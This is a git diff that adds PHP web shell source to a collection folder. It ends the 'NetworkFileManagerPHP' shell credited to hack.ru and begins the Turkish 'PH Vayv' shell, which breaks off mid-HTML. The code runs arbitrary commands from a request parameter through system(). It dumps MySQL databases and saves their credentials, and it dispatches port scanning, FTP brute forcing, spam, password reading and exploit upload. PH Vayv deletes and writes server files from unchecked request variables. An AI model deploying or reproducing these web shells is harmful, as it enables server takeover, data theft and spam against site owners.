bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>"; + + + +} + +// =-=-=-=-= SQL MODULE =-=-=-=-= + +// SQL functions start + +function aff_date() { + + $date_now=date("F j,Y,g:i a"); + + return $date_now; + +} + + + +function sqldumptable($table) { + + global $sv_s,$sv_d,$drp_tbl; + + $tabledump = ""; + + if ($sv_s) { + + if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; } + + $tabledump.="CREATE TABLE $table (\n"; + + $firstfield=1; + + $champs=mysql_query("SHOW FIELDS FROM $table"); + + while ($champ=mysql_fetch_array($champs)) { + + if (!$firstfield) { $tabledump.=",\n"; } + + else { $firstfield=0;} + + $tabledump.=" $champ[Field] $champ[Type]"; + + if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";} + + if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";} + + if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";} + + } + + + + @mysql_free_result($champs); + + $keys=mysql_query("SHOW KEYS FROM $table"); + + while ($key=mysql_fetch_array($keys)) { + + $kname=$key['Key_name']; + + if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";} + + if(!is_array($index[$kname])) { $index[$kname]=array();} + + $index[$kname][]=$key['Column_name']; + + } + + + + @mysql_free_result($keys); + + while(list($kname,$columns)=@each($index)) { + + $tabledump.=",\n"; + + $colnames=implode($columns,","); + + if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";} + + else { + + if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);} + + $tabledump.=" KEY $kname ($colnames)"; + + } + + } + + $tabledump.="\n);\n\n"; + + } + + + + if ($sv_d) { + + $rows=mysql_query("SELECT * FROM $table"); + + $numfields=mysql_num_fields($rows); + + while ($row=mysql_fetch_array($rows)) { + + $tabledump.="INSERT INTO $table VALUES("; + + $cptchamp=-1; + + $firstfield=1; + + while (++$cptchamp<$numfields) { + + if (!$firstfield) { $tabledump.=",";} + + else { $firstfield=0;} + + if (!isset($row[$cptchamp])) {$tabledump.="NULL";} + + else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";} + + } + + $tabledump.=");\n"; + + } + + @mysql_free_result($rows); + + } + + + + return $tabledump; + +} + + + +function csvdumptable($table) { + + global $sv_s,$sv_d; + + $csvdump="## Table:$table \n\n"; + + if ($sv_s) { + + $firstfield=1; + + $champs=mysql_query("SHOW FIELDS FROM $table"); + + while ($champ=mysql_fetch_array($champs)) { + + if (!$firstfield) { $csvdump.=",";} + + else { $firstfield=0;} + + $csvdump.="'".$champ['Field']."'"; + + } + + + + @mysql_free_result($champs); + + $csvdump.="\n"; + + } + + + + if ($sv_d) { + + $rows=mysql_query("SELECT * FROM $table"); + + $numfields=mysql_num_fields($rows); + + while ($row=mysql_fetch_array($rows)) { + + $cptchamp=-1; + + $firstfield=1; + + while (++$cptchamp<$numfields) { + + if (!$firstfield) { $csvdump.=",";} + + else { $firstfield=0;} + + if (!isset($row[$cptchamp])) { $csvdump.="NULL";} + + else { $csvdump.="'".addslashes($row[$cptchamp])."'";} + + } + + $csvdump.="\n"; + + } + + } + + + + @mysql_free_result($rows); + + return $csvdump; + +} + + + +function write_file($data) { + + global $g_fp,$file_type; + + if ($file_type==1) { gzwrite($g_fp,$data); } + + else { fwrite ($g_fp,$data); } + +} + + + +function open_file($file_name) { + + global $g_fp,$file_type,$dbbase,$f_nm; + + if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); } + + else { $g_fp=fopen ($file_name,"w"); } + + + + $f_nm[]=$file_name; + + $data=""; + + $data.="##\n"; + + $data.="## NFM hack.ru creator \n"; + + $data.="##-------------------------\n"; + + $data.="## Date:".aff_date()."\n"; + + $data.="## Base:$dbbase \n"; + + $data.="##-------------------------\n\n"; + + write_file($data); + + unset($data); + +} + + + +function file_pos() { + + global $g_fp,$file_type; + + if ($file_type=="1") { return gztell ($g_fp); } + + else { return ftell ($g_fp); } + +} + + + +function close_file() { + + global $g_fp,$file_type; + + if ($file_type=="1") { gzclose ($g_fp); } + + else { fclose ($g_fp); } + +} + + + +function split_sql_file($sql) { + + $morc=explode(";",$sql); + + $sql=""; + + $output=array(); + + $matches=array(); + + $morc_cpt=count($morc); + + for ($i=0;$i < $morc_cpt;$i++) { + + if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) { + + $total_quotes=preg_match_all("/'/",$morc[$i],$matches); + + $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches); + + $unescaped_quotes=$total_quotes-$escaped_quotes; + + if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; } + + else { + + $temp=$morc[$i].";"; + + $morc[$i]=""; + + $complete_stmt=false; + + for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) { + + $total_quotes = preg_match_all("/'/",$morc[$j],$matches); + + $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches); + + $unescaped_quotes=$total_quotes-$escaped_quotes; + + if (($unescaped_quotes % 2)==1) { + + $output[]=$temp.$morc[$j]; + + $morc[$j]=""; + + $temp=""; + + $complete_stmt=true; + + $i=$j; + + } else { + + $temp.=$morc[$j].";"; + + $morc[$j]=""; + + } + + } + + } + + } + + } + + return $output; + +} + + + +function split_csv_file($csv) { return explode("\n",$csv); } + +// SQL functions END + + + +// main SQL() + +function sql() { + + global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm; + + $secu_config="xtdump_conf.inc.php"; + + $dbhost=$_POST['dbhost']; + + $dbuser=$_POST['dbuser']; + + $dbpass=$_POST['dbpass']; + + $dbbase=$_POST['dbbase']; + + $tbls =$_POST['tbls']; + + $sqlaction =$_POST['sqlaction']; + + $secu =$_POST['secu']; + + $f_cut =$_POST['f_cut']; + + $fz_max =$_POST['fz_max']; + + $opt =$_POST['opt']; + + $savmode =$_POST['savmode']; + + $file_type =$_POST['file_type']; + + $ecraz =$_POST['ecraz']; + + $f_tbl =$_POST['f_tbl']; + + $drp_tbl=$_POST['drp_tbl']; + + + + $header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>"; + + $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-go back-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright(); + + + + // SQL actions STARTS + + + + if ($sqlaction=='save') { + + if ($secu==1) { + + $fp=fopen($secu_config,"w"); + + fputs($fp,"<?php\n"); + + fputs($fp,"\$dbhost='$dbhost';\n"); + + fputs($fp,"\$dbbase='$dbbase';\n"); + + fputs($fp,"\$dbuser='$dbuser';\n"); + + fputs($fp,"\$dbpass='$dbpass';\n"); + + fputs($fp,"?>"); + + fclose($fp); + + } + + if (!is_array($tbls)) { + + echo $header."<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\"> + +<br><center><font color=red>You forgot to check tables, which you need to dump =)</b></font></center>\n$footer"; + + exit; + + } + + if($f_cut==1) { + + if (!is_numeric($fz_max)) { + + echo $header."<br><center><font color=red><b>Veuillez choisir une valeur num?rique ? la taille du fichier ? scinder.</b></font></center>\n$footer"; + + exit; + + } + + if ($fz_max < 200000) { + + echo $header."<br><center><font color=red><b>Veuillez choisir une taille de fichier a scinder sup + + rieure ? 200 000 Octets.</b></font></center>\n$footer"; + + exit; + + } + + } + + + + $tbl=array(); + + $tbl[]=reset($tbls); + + if (count($tbls) > 1) { + + $a=true; + + while ($a !=false) { + + $a=next($tbls); + + if ($a !=false) { $tbl[]=$a; } + + } + + } + + + + if ($opt==1) { $sv_s=true; $sv_d=true; } + + else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; } + + else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; } + + else { exit; } + + + + $fext=".".$savmode; + + $fich=$dbbase.$fc.$fext; + + $dte=""; + + if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz=""; + + if ($file_type=='1') { $gz.=".gz"; } + + $fcut=false; + + $ftbl=false; + + $f_nm=array(); + + if($f_cut==1) { $fcut=true;$fz_max=$fz_max;$nbf=1;$f_size=170;} + + if($f_tbl==1) { $ftbl=true; } + + else { + + if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); } + + else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); } + + } + + + + $nbf=1; + + mysql_connect($dbhost,$dbuser,$dbpass); + + mysql_select_db($dbbase); + + if ($fext==".sql") { + + if ($ftbl) { + + while (list($i)=each($tbl)) { + + $temp=sqldumptable($tbl[$i]); + + $sz_t=strlen($temp); + + if ($fcut) { + + open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz); + + $nbf=0; + + $p_sql=split_sql_file($temp); + + while(list($j,$val)=each($p_sql)) { + + if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); } + + else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); } + + } + + close_file(); + + } + + else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; } + + $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>"; + + } + + } else { + + $tblsv=""; + + while (list($i)=each($tbl)) { + + $temp=sqldumptable($tbl[$i]); + + $sz_t=strlen($temp); + + if ($fcut && ((file_pos()+$sz_t) > $fz_max)) { + + $p_sql=split_sql_file($temp); + + while(list($j,$val)=each($p_sql)) { + + if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); } + + else { + + close_file(); + + $nbf++; + + open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz); + + write_file($val.";"); + + } + + } + + } else { write_file($temp); } + + $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>"; + + } + + } + + } + + else if ($fext==".csv") { + + if ($ftbl) { + + while (list($i)=each($tbl)) { + + $temp=csvdumptable($tbl[$i]); + + $sz_t=strlen($temp); + + if ($fcut) { + + open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz); + + $nbf=0; + + $p_csv=split_csv_file($temp); + + while(list($j,$val)=each($p_csv)) { + + if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); } + + else { + + close_file(); + + $nbf++; + + open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz); + + write_file($val."\n"); + + } + + } + + close_file(); + + } else { + + open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz); + + write_file($temp."\n\n"); + + close_file(); + + $nbf=1; + + } + + $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>"; + + } + + } else { + + while (list($i)=each($tbl)) { + + $temp=csvdumptable($tbl[$i]); + + $sz_t=strlen($temp); + + if ($fcut && ((file_pos()+$sz_t) > $fz_max)) { + + $p_csv=split_sql_file($temp); + + while(list($j,$val)=each($p_csv)) { + + if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); } + + else { + + close_file(); + + $nbf++; + + open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz); + + write_file($val."\n"); + + } + + } + + } else { write_file($temp); } + + $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>"; + + } + + } + + } + + + + mysql_close(); + + if (!$ftbl) { close_file(); } + + + + echo $header; + + echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted to this file:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>File</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Size</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>"; + + reset($f_nm); + + while (list($i,$val)=each($f_nm)) { + + $coul='#99CCCC'; + + if ($i % 2) { $coul='#CFE3E3'; } + + echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>"; + + $fz_tmp=filesize($val); + + if ($fcut && ($fz_tmp > $fz_max)) { + + echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_tmp." Octets</font>&nbsp;</td><td></td></tr>"; + + } else { + + echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." bites</font>&nbsp;</td><td></td></tr>"; + + } + + echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>"; + + } + + echo "</table><br>"; + + echo $footer;exit; + + } + + + + if ($sqlaction=='connect') { + + if(!@mysql_connect($dbhost,$dbuser,$dbpass)) { + + echo $header."<br><center><font color=red><b>Unable to connect! Check your data input!</b></font></center>\n$footer"; + + exit; + + } + + + + if(!@mysql_select_db($dbbase)) { + + echo $header."<br><center><font color=red><<b>Unable to connect! Check your data input!</b></font></center>\n$footer"; + + exit; + + } + + + + if ($secu==1) { + + if (!file_exists($secu_config)) { + + $fp=fopen($secu_config,"w"); + + fputs($fp,"<?php\n"); + + fputs($fp,"\$dbhost='$dbhost';\n"); + + fputs($fp,"\$dbbase='$dbbase';\n"); + + fputs($fp,"\$dbuser='$dbuser';\n"); + + fputs($fp,"\$dbpass='$dbpass';\n"); + + fputs($fp,"?>"); + + fclose($fp); + + } + + include($secu_config); + + } else { + + if (file_exists($secu_config)) { unlink($secu_config); } + + } + + + + mysql_connect($dbhost,$dbuser,$dbpass); + + $tables=mysql_list_tables($dbbase); + + $nb_tbl=mysql_num_rows($tables); + + + + echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Choose tables you need to dump!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Check all' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>Table names</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>"; + + + + $i=0; + + while ($i < mysql_num_rows ($tables)) { + + $coul='#99CCCC'; + + if ($i % 2) { $coul='#CFE3E3';} + + $tb_nom=mysql_tablename ($tables,$i); + + echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;&nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>"; + + $i++; + + } + + + + mysql_close(); + + echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'> + + Save to csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked> + + Save to Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked> + + Save structure and data<br> <input type='radio' name='opt' value='2'> + + Save structure only<br> <input type='radio' name='opt' value='3'> + + Save data only<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked> + + Rewrite file if exists<br> <input type='Checkbox' name='ecraz' value='1' checked> + + Clear database after dump<br> <input type='Checkbox' name='f_tbl' value='1'> + + Put each table to a separate file<br> <input type='Checkbox' name='f_cut' value='1'> + + Maximum dump-file size: <input type='text' name='fz_max' value='200000' class=form> + + Octets<br> <input type='Checkbox' name='file_type' value='1'> + + Gzip.<br> + + </td></tr></table><br><br><input type='submit' value=' Dump:) ' class=form></form></center>$footer"; + + exit; + + } + + + +// SQL actions END + + + + if(file_exists($secu_config)) { + + include ($secu_config); + + $ck="checked"; + + } else { + + $dbhost="localhost"; + + $dbbase=""; + + $dbuser="root"; + + $dbpass=""; + + $ck=""; + + } + + + + echo $header." + +<center><br><br> + +<table width=620 cellpadding=0 cellspacing=0 align=center> + + <col width=1> + + <col width=600> + + <col width=1> + + <tr> + + <td></td> + + <td align=left class=texte> + + <br> + + <form action='' method='post'> + + <input type='hidden' name='sqlaction' value='connect'> + + <table border=0 align=center> + + <col> + + <col align=left> + + <tr> + + <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Enter data to connect to MySQL server!<br><br></td> + + </tr> + + <tr> + + <td class=texte>Server address:</td> + + <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td> + + </tr> + + <tr> + + <td class=texte>Base name:</td> + + <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td> + + </tr> + + <tr> + + <td class=texte>Login:</td> + + <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td> + + </tr> + + <tr> + + <td class=texte>Password</td> + + <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td> + + </tr> + + </table> + + <br> <center> <br><br> + + <input type='submit' value=' Connect ' class=form></center> </form> <br><br> + + </td> + + <td></td> + + </tr> + + <tr> + + <td height=1 colspan=3></td> + + </tr> + +</table> + +</center>"; + + + +} + +// SQL END + + + +/* main() */ + +set_time_limit(0); + + + +if ( $action !="download") print("$HTML"); + + + +if (!isset($cm)) { + + if (!isset($action)) { + + if (!isset($tm)) { $tm = getcwd(); } + + $curdir = getcwd(); + + if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>Access to directory is denied, see CHMOD.</td></tr></table>"); + + getdir(); + + chdir($curdir); + + $supsub = $gdir[$j-1]; + + if (!isset($tm) ) { $tm=getcwd();} + + readdirdata($tm); + + } else { + + switch ($action) { + + case "view": + + viewfile($tm,$fi); + + break; + + case "delete": + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fi</b> was deleted successfully.</font></center></td></tr></table>"; + + deletef($tm); + + break; + + case "download": + + if (isset($fatt) && strlen($fatt)>0) { + + $attach=$fatt; + + header("Content-type: text/plain"); + + } + + else { + + $attach=$fi; + + header("Content-type: hackru"); + + } + + header("Content-disposition: attachment; filename=\"$attach\";"); + + readfile($tm."/".$fi); + + break; + + case "download_mail": + + download_mail($tm,$fi); + + break; + + case "edit": + + editfile($tm,$fi); + + break; + + case "save": + + savefile($tm,$fi); + + break; + + case "uploadd": + + uploadtem(); + + break; + + case "up": + + up($tm); + + break; + + case "newdir": + + newdir($tm); + + break; + + case "createdir": + + cdir($tm); + + break; + + case "deldir": + + deldir(); + + break; + + case "feedback": + + mailsystem(); + + break; + + case "upload": + + upload(); + + break; + + case "help": + + help(); + + break; + + case "ftp": + + ftp(); + + break; + + case "portscan": + + portscan(); + + break; + + case "sql": + + sql(); + + break; + + case "tar": + + tar(); + + break; + + case "bash": + + bash(); + + break; + + case "passwd": + + passwd(); + + break; + + case "exploits": + + exploits($dir); + + break; + + case "upload_exploits": + + upload_exploits($dir); + + break; + + case "upload_exploitsp": + + upload_exploitsp($dir); + + break; + + case "arhiv": + + arhiv($tm,$pass); + + break; + + case "crypte": + + crypte(); + + break; + + case "decrypte": + + decrypte(); + + break; + + case "brut_ftp": + + brut_ftp(); + + break; + + case "copyfile": + + copyfile($tm,$fi); + + break; + + case "down": + + down($dir); + + break; + + case "downfiles": + + downfiles($dir); + + break; + + case "spam": + + spam(); + + break; + + } + + } + +} else { + + echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Done: $cm</center><pre>"; + + echo system($cm); + + echo "</pre></td></tr></table>"; + +} + + + +if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd" && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") { + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Command prompy (like bash):</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>"; + + $perdir = @permissions(fileperms($tm)); + + if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem(); + + else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to upload files to current directory</b></font></td></tr></table>"; + + if ($perdir[7] == "w" && isset($tm)) { + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>"; + + } else { + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to create directory here</b></td></tr></table>"; + + } + +} + + + +if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd" && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") { + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Ready usefull requests to unix server:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>"; + + foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>"; + + echo "</select></td><td valign=top align=right width=5%><input type=submit value='GO' class=button1 $style_button></td></tr></table></form>"; + +} + + + +if ( $action !="download") echo nfm_copyright(); + +?> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP2.jpg b/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP2.jpg new file mode 100644 index 0000000..160b641 Binary files /dev/null and b/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP2.jpg differ diff --git a/php/PHPshell/PH Vayv/PH Vayv.jpg b/php/PHPshell/PH Vayv/PH Vayv.jpg new file mode 100644 index 0000000..e764ae4 Binary files /dev/null and b/php/PHPshell/PH Vayv/PH Vayv.jpg differ diff --git a/php/PHPshell/PH Vayv/PH Vayv.php b/php/PHPshell/PH Vayv/PH Vayv.php new file mode 100644 index 0000000..c01e2c7 --- /dev/null +++ b/php/PHPshell/PH Vayv/PH Vayv.php @@ -0,0 +1,597 @@ +<? if($sistembilgisi > "") {phpinfo();} else { ?> + + +<?$fistik=PHVayv;?> + + +<?if ($sildos>"") {unlink("$dizin/$sildos");} ?> + +<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?> + +<?if ($silklas > ""){rmdir($silklas);}?> + +<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?> + + + +<?if ($yenidosya == "1") { +$baglan=fopen("$dizin/$duzenx2",'w'); +fwrite($baglan,$duzenx); +fclose($baglan);} +?> + + + + +<?if ($duzkaydet > "") { + +$baglan=fopen($duzkaydet,'w'); +fwrite($baglan,$duzenx); +fclose($baglan);} +?> + + + + +<?if ($yenklas>"") {;?> +<body topmargin="0" leftmargin="0"> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59"> + <tr> + <td width="70" bgcolor="#000000" height="76"> + <p align="center"> + <img border="0" src="http://www.aventgrup.net/avlog.gif"></td> + <td width="501" bgcolor="#000000" height="76" valign="top"> + <font face="Verdana" style="font-size: 8pt" color="#B7B7B7"> + <span style="font-weight: 700"> + <br> + AventGrup©<br> + </span>Avrasya Veri ve NetWork Teknolojileri Geli‏tirme Grubu<br> + <span style="font-weight: 700"> + <br> + PHVayv 1.0</span></font></td> + <td width="431" bgcolor="#000000" height="76" valign="top"> + <p align="right"><span style="font-weight: 700"> + <font face="Verdana" color="#858585" style="font-size: 2pt"><br> + </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F"> + <a href="http://www.aventgrup.net" style="text-decoration: none"> + <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br> + </font></span><font face="Verdana" style="font-size: 8pt" color="#858585"> + <a href="mailto:shopen@aventgrup.net" style="text-decoration: none"> + <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td> + </tr> + </table> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20"> + <tr> + <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana"> + <span style="font-size: 8pt">&nbsp;اal‎‏‎lan </span></font> + <font face="Verdana" style="font-size: 8pt">Dizin</font></td> + <td bgcolor="#D6D6D6" height="20"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4"> + <tr> + <td width="1"></td> + <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td> + <td width="65"> + &nbsp;</td> + </tr> + </table> + </td> + </tr> +</table> + +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184"> + <tr> + <td width="100%" bgcolor="#000000" height="19">&nbsp;</td> + </tr> + <tr> + <td width="100%" bgcolor="#9F9F9F" align="center" height="144"> + <form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>" + <p align="center"><br> + <font + color="#FFFFFF" size="1" face="Arial"> +<input + type="text" size="37" maxlength="32" + name="duzenx2" value="Klasِr Ad‎" + class="search" + onblur="if (this.value == '') this.value = 'Kullan‎c‎'" + onfocus="if (this.value == 'Kullan‎c‎') this.value=''" + style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p> +<p align="center"> + <span class="gensmall"> + <input type="submit" size="16" + name="duzenx1" value="Kaydet" + style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center" + </span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br> +&nbsp;</font></b></p> +</form> +</td> + </tr> + <tr> + <td width="100%" bgcolor="#000000" align="center" height="19"> + &nbsp;</td> + </tr> + </table> + + + +<? } else { ?> + + + + +<?if ($yendos>"") {; +?> + +<body topmargin="0" leftmargin="0"> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59"> + <tr> + <td width="70" bgcolor="#000000" height="76"> + <p align="center"> + <img border="0" src="http://www.aventgrup.net/avlog.gif"></td> + <td width="501" bgcolor="#000000" height="76" valign="top"> + <font face="Verdana" style="font-size: 8pt" 